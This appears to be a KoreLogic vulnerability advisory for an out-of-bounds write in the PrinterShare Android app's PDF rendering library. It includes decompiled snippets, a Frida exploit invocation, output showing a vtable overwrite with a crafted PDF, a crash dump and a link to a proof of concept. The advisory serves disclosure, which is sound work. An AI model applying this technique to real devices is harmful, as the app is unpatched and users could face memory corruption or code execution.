Affected Systems
Discovered By
Vulnerability Details
Vulnerability Description
An Out of Bounds Write occurs when the native library attempts PDF rendering, which can be exploited to achieve memory corruption and potentially arbitrary code execution.
Technical Description
- Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite)
- Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device.
- Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
- The target Activity is exported true. Which means any application may interact with it, given that permissions are provided.
The ActivityPrintDocuments class processes PDF files through JNI calls to native libraries. The vulnerability exists in the native component (libpdfrender.so) that handles PDF rendering and can be triggered when processing PDF files with manipulated dimensions and structure.
The vulnerability is accessible through the
ActivityPrintDocuments class, which is launched when opening
a PDF file:
// From activityprintdocuments.java
class j extends h {
@Override
public void a(Canvas canvas, boolean z2) {
// ...
int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
// ...
}
}The PDF rendering happens in class j (subclass of h), which calls the vulnerable native function:
// From activityprintdocuments.java
class j extends h {
@Override
public void a(Canvas canvas, boolean z2) {
// ...
int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
// ...
}
}The shared object function performs memory operations without proper validation, allowing attackers to manipulate memory via crafted inputs.
undefined8 entry(long base_addr, int flag, char option) {
// ...
temp_long = *(long *)(base_addr + 0x90);
*(undefined4 *)(temp_long + 0x18) = 0;
// ... [Insufficient bounds checking on pointers]
*(undefined8 *)(temp_long + 0x28) = 0;
*(undefined8 *)(temp_long + 0x20) = 0;
*(ulong *)(temp_long + 0x10) = temp_ulong;
// ...
}The Frida script hooks critical native functions
in libpdfrender.so, particularly targeting
Java_com_dynamixsoftware_printershare_PDFrender_drawPage. It
creates a malformed PDF with extreme dimensions (values
of 0x7FFFFFFF or INT_MAX) designed to trigger buffer
overflows. When the drawPage native function is called with
corrupted parameters; it leads to memory corruption.
$ frida -U -f com.dynamixsoftware.printershare -l exploit.js
____
/ _ | Frida 16.6.5 - A world-class dynamic instrumentation toolkit
| (_| |
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://frida.re/docs/home/
. . . .
. . . . Connected to SM T220 (id=R83X10JATAV)
Spawning `com.dynamixsoftware.printershare`...
Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
[SM T220::com.dynamixsoftware.printershare ]-> [!] Terminal exploitation initialized
[!] Initiating terminal exploit sequence
[*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
[*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$h.a
[*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$j.a
[!] Creating terminal exploit PDF
[+] Using existing exploit PDF
[!] Launching with payload at /sdcard/Download/terminal_exploit.pdf
[!] Called com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
[+] Found libpdfrender.so at 0x75521e4000
[!] Found critical function pointer: 0x75521e4e98
...SNIP...
[!] Target function called
[*] Original pageNum: 0x76b5496bc0
[-] Error modifying dimensions: Error: access violation accessing 0x0
[*] Flags changed: 0 -> 2065
[!] Called critical function: 0xb4000075790586a0
[*] Potential vtable: 0xb4000075790586a0 -> 0x762801f5a0
[!] Overwrote potential vtable with "AAAAAAAA"
[!] MEMORY MODIFIED at 0xb4000075790586a0 (vtable pointer):
BEFORE:
00000000 a0 f5 01 28 76 00 00 00 ...(v...
AFTER:
00000000 00 40 41 41 41 41 41 41 .@AAAAAA
[!] Corrupted 64-byte memory chunk starting at object
[!] MEMORY MODIFIED at 0xb4000075790586a0 (object memory):
BEFORE:
00000000 00 40 41 41 41 41 41 41 00 b8 e3 78 75 00 00 b4 .@AAAAAA...xu...
00000010 80 03 e9 29 76 00 00 b4 00 00 00 00 00 00 00 00 ...)v...........
00000020 80 00 00 00 fc ff ff ff 00 fe 3f d0 76 00 00 00 ..........?.v...
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
AFTER:
00000000 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
00000010 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
00000020 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
00000030 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
[!] Target function returned: 0xffffffff
[-] Post-function corruption error: Error: invalid operation
Process crashed: Bad access due to invalid address
***
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
Revision: '0'
ABI: 'arm64'
Processor: '4'
Timestamp: 2025-03-03 09:31:59.556177436-0800
Process uptime: 4s
Cmdline: com.dynamixsoftware.printershare
pid: 31838, tid: 32000, name: Thread-17 >>> com.dynamixsoftware.printershare <<<
uid: 10243
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414000
x0 b4000075790586a0 x1 0000000000000003 x2 0000000000000000 x3 0000000000000000
x4 0000000000000000 x5 0000000000000000 x6 0000000000000000 x7 0000000000000000
x8 0000000000004200 x9 0000007627bdd114 x10 0000007553d43d50 x11 0000007553d43cd0
x12 0000000000000008 x13 00000076c4d36f78 x14 0000000000000010 x15 00000076d2300a00
x16 000000761084cf48 x17 00000076cd911f30 x18 0000000000000000 x19 0000000000000003
x20 b4000075790586a0 x21 4141414141414000 x22 000000760f393a40 x23 0000007553d47000
x24 0000000000000010 x25 00000076d22fe840 x26 0000000000000002 x27 0000007553d43ed0
x28 0000000000000010 x29 0000007553d43d40
lr 000000760fb92440 sp 0000007553d43d00 pc 0000007627bdd168 pst 0000000060000000
...SNIP...Mitigation and Remediation Recommendation
No response from vendor. There are no known mitigations to end-users of the affected application versions.
Credit
This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.
Proof of Concept
URL: https://www.korelogic.com/advisories/KL-001-2025-004.poc.js.txt
SHA256sum: 8f1df24eb0027d8bfc13092988839c5f8a3fb39a57912d338af719b23d253b2c
The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Disclosure Timeline
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.
KoreLogic public disclosure.
Responsible Disclosure
KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.